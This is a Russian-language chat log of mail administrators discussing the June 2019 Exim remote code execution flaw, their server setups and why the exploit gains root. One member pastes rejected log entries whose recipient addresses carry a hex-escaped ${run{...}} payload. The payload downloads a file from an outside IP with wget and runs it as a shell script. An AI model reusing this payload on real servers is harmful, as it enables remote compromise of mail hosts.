Size: a a a

Independent mail community

2019 June 10

AI

Anatolij Iz Podvala in Independent mail community
счастье, что у меня haraka, если чего и пропишут, то из докер контейнера с ограниченным пользователемо но не вылезет...
источник

D

Denis in Independent mail community
Anatolij Iz Podvala
счастье, что у меня haraka, если чего и пропишут, то из докер контейнера с ограниченным пользователемо но не вылезет...
У меня тоже в дыркере, но это не отменяет массового дизлайка exim. Может наконец перейдут на Postfix/Haraka или гошные альтернативы.
источник
2019 June 11

R

Raven in Independent mail community
Мне вот все-таки категорически интересно, почему в случае с конкретно этой уязвимостью все бросились проклинать exim, а не свои кривые конфиги или нежелание следить за софтом?
Лог с сервака клиента, 4.91, настраивался чёрти когда:
2019-06-10 05:21:13 H=(server.***.ru) [89.248
.171.57] F=<> rejected RCPT <${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
2019-06-10 05:21:13 H=(server.***.ru) [89.248.171.57] F=<> rejected RCPT <root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
2019-06-10 05:21:13 H=(server.***.ru) [89.248.171.57] F=<> rejected RCPT <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyimrv\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyimrv\x20\x2dn\x22\x20\x26}}@server.***.ru>: relay not permitted
источник

R

Raven in Independent mail community
Записей куча, сервак цел и невредим
источник

+

+_- in Independent mail community
ну ты разобрался. почему он цел?
источник

+

+_- in Independent mail community
релей нот пермитед, потому что наверно домен не совпадает
источник

+

+_- in Independent mail community
если правильно вписать домен, то всё ок будет
источник

+

+_- in Independent mail community
Лучше подскажите, а каким фигом эта rce даёт возможность запускать команду под root, если exim работает под юзером exim?
источник

R

Raven in Independent mail community
+_-
если правильно вписать домен, то всё ок будет
будет "User doesn't exists")
источник

+

+_- in Independent mail community
У тебя нет пользователя рут на системе?
источник

+

+_- in Independent mail community
+_-
Лучше подскажите, а каким фигом эта rce даёт возможность запускать команду под root, если exim работает под юзером exim?
> ls -lah  /usr/sbin/sendmail.exim
lrwxrwxrwx. 1 root root 4 Jun 10 11:32 /usr/sbin/sendmail.exim -> exim
источник

+

+_- in Independent mail community
n> ls -lah  /usr/sbin/exim
-rwsr-xr-x. 1 root root 1.4M Jun  5 12:22 /usr/sbin/exim
источник

+

+_- in Independent mail community
ясно
источник

R

Raven in Independent mail community
+_-
У тебя нет пользователя рут на системе?
never_users = root
источник

+

+_- in Independent mail community
хм, у меня тоже так)
источник

+

+_- in Independent mail community
это с коробки?
источник

R

Raven in Independent mail community
+_-
Лучше подскажите, а каким фигом эта rce даёт возможность запускать команду под root, если exim работает под юзером exim?
потому, что exim работает под разными пользователями, когда обслуживает кучу локальных юзерей с мейлдирами в /home/$USER и он ДОЛЖЕН смочь положить туда письмо.
источник

+

+_- in Independent mail community
Raven
потому, что exim работает под разными пользователями, когда обслуживает кучу локальных юзерей с мейлдирами в /home/$USER и он ДОЛЖЕН смочь положить туда письмо.
это я понимаю, я хотел понять как это реализовано с точки зрения линукс
источник

+

+_- in Independent mail community
нашёл
источник

+

+_- in Independent mail community
источник